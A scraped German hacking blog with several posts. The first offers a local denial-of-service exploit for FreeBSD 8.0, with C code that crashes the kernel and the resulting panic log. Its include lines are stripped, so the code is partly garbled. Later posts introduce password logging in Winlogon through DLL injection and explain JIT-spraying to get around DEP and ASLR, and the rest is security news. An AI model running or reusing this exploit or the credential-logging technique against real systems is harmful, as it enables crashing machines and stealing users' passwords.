Local DoS Exploit f0r BSD Release 8

Wird der Exploit kompiliert und ausgeführt crasht das System und startet neu. (null pointer dereference)

# Exploit Title: FreeBSD local denial of service – forced reboot
# Date: 28. January 2011
# Author: Kingcope
# Software Link: http://www.freebsd.org
# Operating System: FreeBSD
# Tested on: 8.0-RELEASE

#include
#include
#define PAGE_SIZE 4096
#include
#include
#include
main() {
int k,fd,i2,i3,i4,i5,i6,i7,i8;
char *p;
char buf[4096];
for (i2=0;i2<256;i2++) {
for (i3=0;i3<2;i3++) {
for (i4=0;i4<2;i4++) {
fd = socket(i2, i3, i4);
if (fd < 0) continue;
printf("SUCCESS!\n");
for (i5=0;i5<100;i5++) {
for (i6=0;i6<100;i6++) {
setsockopt(fd, i5, i6, buf, 4);
getsockopt(fd, i5, i6, buf, &i7);
}}}}}
}

Hier das Crashlog:

Jan 28 11:33:07 r00tme kernel:
Jan 28 11:33:07 r00tme kernel:
Jan 28 11:33:07 r00tme kernel: Fatal trap 12: page fault while in kernel mode
Jan 28 11:33:07 r00tme kernel: cpuid = 0; apic id = 00
Jan 28 11:33:07 r00tme kernel: fault virtual address = 0xc
Jan 28 11:33:07 r00tme kernel: fault code = supervisor
write, page not present
Jan 28 11:33:07 r00tme kernel: instruction pointer = 0×20:0xc06143ba
Jan 28 11:33:07 r00tme kernel: stack pointer = 0×28:0xcd1fa5b4
Jan 28 11:33:07 r00tme kernel: frame pointer = 0×28:0xcd1fa85c
Jan 28 11:33:07 r00tme kernel: code segment = base 0×0,
limit 0xfffff, type 0x1b
Jan 28 11:33:07 r00tme kernel: = DPL 0, pres 1, def32 1, gran 1
Jan 28 11:33:07 r00tme kernel: processor eflags = interrupt enabled,
resume, IOPL = 0
Jan 28 11:33:07 r00tme kernel: current process = 1004 (bsdcrash)
Jan 28 11:33:07 r00tme kernel: trap number = 12
Jan 28 11:33:07 r00tme kernel: panic: page fault
Jan 28 11:33:07 r00tme kernel: cpuid = 0
Jan 28 11:33:07 r00tme kernel: Uptime: 2m48s
Jan 28 11:33:07 r00tme kernel: Cannot dump. Device not defined or unavailable.
Jan 28 11:33:07 r00tme kernel: Automatic reboot in 15 seconds – press
a key on the console to abort
Jan 28 11:33:07 r00tme kernel: Rebooting…

Anscheinend funktioniert der Exploit nur wenn das System mit einer VMware Lösung virtualisiert wird und einen bestimmten NIC Treiber nutzt.

Winlogon loggen? - Part 1 - Die DLL

Moin Leute,

dieser Artikel wird der erste einer Reihe von Artikeln, welche sich rund um das Thema DLL-Injection drehen, allerdings setzt der Artikel trotzdem einige Vorkenntnisse in diesem Bereich vorraus. Nun denn, auf gehts!

Ich hatte gestern ein wenig langweile, und bin auf folgenden Artikel gestoßen:

http://vxheavens.com/lib/vra07.html

Ich fand es nicht unintressant, dass man das PW bei WindowsXP (und Win7 und/oder Vista?) so einfach mitloggen kann, allerdings bin ich dann auf eine Idee gekommen, die das ganze noch VIEL einfacher, und stabiler, machen sollte.

Bevor ihr weiterlest, solltet ihr aber trotzdem sicherstellen dass ihr gute Kenntnisse in C/C++ besitzt und verstanden habt was DLL-Injection ist. Falls nicht, seid unbesorgt, es gibt viele Tutorials und Code-Snippets zu diesem Thema.
Mehr …

JIT-Spraying strikes back!

Servus,

ich beschäftige mich im Moment mit JIT-Spraying. Im Regelfall wird diese Art des Exploiting durch die Data Execution Prevention (DEP) im Bios und das Address Space Layout Randomization (ASLR) im jeweiligem OS verhindert. Wer sich jedoch an die letzte fatale Vuln im Adobe Reader erinnert, weiß das es nicht unmöglich jene Schutzmechanismen zu umgehen.

JIT-Exploiting funktioniert nach einem einfachem Prinzip. Während der Laufzeit eines Programms, wird der Schadcode JIT(just in time) kompiliert. Nun springen aber die oben genannten Schutzmechanisem an und versuchen die execution des Codes zu verhindern.

Dion Blazakis hat einen Weg gefunden um jene Schutzmechanismen mit einem Actionscript(Flash) aus zu tricksen. Er beruht darauf, dass es bei einer Folge von Bytes sehr wohl darauf ankommt, an welcher Stelle genau man beginnt, sie als Code zu interpretieren.

Diese XOR-Befehle in ActionScript

var ret=(0x3C909090^0x3C909090^0x3C909090^0x3C909090^ …);

übersetzt der JIT-Compiler in folgende Maschinenbefehle:

0x1A1A0100: 359090903C XOR EAX, 3C909090
0x1A1A0105: 359090903C XOR EAX, 3C909090
0x1A1A010A: 359090903C XOR EAX, 3C909090

Springt man jedoch knapp daneben, auf eine der Speicheradressen mit dem Wert 0x90 sieht die CPU das Folgende:

0x1A1A0101: 90 NOP
0x1A1A0102: 90 NOP
0x1A1A0103: 90 NOP
0x1A1A0104: 3C35 CMP AL, 35
0x1A1A0106: 90 NOP
...

Das Ding an der Sache ist es also, das durch eine gefuchste Wahl der XOR Wertes es auch möglich ist andern Code JIT kompilieren und ausführen zu können. Es ist also möglich jegliche Schutzmechanismen vom AS zu umgehen und die Mechanismen von BIOS und OS gar nicht erst auf den Plan zu rufen. Sobald eine solche Möglichkeit gefunden wurde ist ein Tutorial nicht fern

In diesem Beispiel wird gezeigt wird durch die oben genannte Technik Code ausgeführt wird(idF die Systemeigene calc.exe)

Moin moin!

Hallo da! CCiTT hat mich eben gefragt ob ich nicht Lust hätte, ein bisschen was zu bloggen.

Da ich bisher noch nie gebloggt habe, dachte ich mir, dass ich das unbedingt mal austesten muss.

Mein erster, bzw. zweiter Eintrag kommt auch gleich, ihr dürft gespannt sein!

Bis gleich,

S3RB31

google’s pwn2own

Google hat 20.000 US-Dollar für einen Angriff auf seinen Browser Chrome ausgelobt, wenn dabei auch der Ausbruch aus der schützenden Sandbox gelingt. Die Sandbox soll Zugriffe auf das System verhindern, wenn ein Exploit es doch mal schafft, durch eine Lücke Code einzuschleusen und zu starten. Zuletzt wurde eine derartige Lücke Mitte Januar in Chrome geschlossen – der Entdecker erhielt dafür 3133,7 US-Dollar.

Mehr Informationen und die Ausschreibung gibt es bei Tripping Point

Na dann hackt mal die die Tasten und viel Spaß.

Euer CCiTT

Neues nmap in Version 5.5

Habe eben das Tool nmap bei einer Migration gebraucht bzw wolle ein paar Ports checken, da fiel mir auf das eine neue Version erschienen ist und ich es nicht mit bekommen habe. Gibts das?

Zu beziehen wie immer auf nmap.org

Auch zenmap wurde wohl überarbeitet. Ich persönliche nutze die GUI aber eigentlich nie, bin ein alter Konsolenfreak.

Das nur mal nebenbei(irgendwie muss man sich ja vor der Arbeit drücken)

Euer CCiTT

Der Screenshot Trojaner des LKA

Eben habe ich auf Heise gelesen das das bayrische LKA mal wieder ihre Kompetenzen überschritten hat. Sie haben einen Verdächtigen mit einem Trojaner(wie auch immer sie den bei ihm eingeschleust haben) überwacht. Dieser hat wohl alle 30 Sekunden einen Screenshot vom Browserinhalt gemacht und an die Behörde weitergeleitet. Pfuii.

Für mich ein Grund allen zu raten, die etwas zu verbergen haben, einfach auf eine Linux Distribution ihrer Wahl umzusteigen. Ich kann mir nur schlecht vorstellen das jene Behörden auch virtuelle Waffe für die Unixschienen vorweisen können, jedenfalls noch nicht.

Ich finde es bedenklich das jene Behörden immer wieder ihre eigentlichen Rechte überschreiten, obwohl sie doch dem Bürger ein gutes Vorbild sein sollen. Was man dagegen tun kann? Es gibt keine Patentlösung, oder wartet, doch, seid lieb und lebt gesetzeskonform. Mist, da hab ich ja ganz vergessen das dies auch nicht vor der staatlichen Spionage schützt.

UIIIIII, CCiTT

Auch FBI gegen “Anonymous”

Die US-Bundespolizei FBI hat zu einem Schlag gegen die Hackergruppe “Anonymous” ausgeholt: Ihre Agenten hätten im ganzen Land insgesamt 40 Häuser und Wohnungen durchsucht, teilte die Bundesbehörde in der Nacht zum Freitag mit. In Großbritannien hatte die Polizei bereits am Donnerstag fünf mutmaßliche Computer-Hacker festgenommen, die mittlerweile gegen Kaution wieder auf freiem Fuß sind.

Ende letzten Jahres hatten Sympathisanten der Enthüllungsplattform Wikileaks die Internetseiten der Kreditkartenfirmen Mastercard und Visa attackiert, nachdem die Unternehmen den Zahlungsverkehr mit Wikileaks eingestellt hatten. Daraufhin starteten Sympathisanten die “Operation Payback” und legten mit gezielten und koordinierten Zugriffen die Internetseiten der Firmen zeitweise lahm

Anbieterwechsel bringt den Neustart.

Nach dem ständigen DDos auf das Hostsystem meines Anbieters haben ich jetzt meine Anbieter gewechselt und mein Hostingkonzept umgestellt.
Ich nutze die Gelegenheit um den Blog neu hochzuziehen, also bitte ich quasi um etwas Geduld

Grüße, eurer CCiTT

Nach oben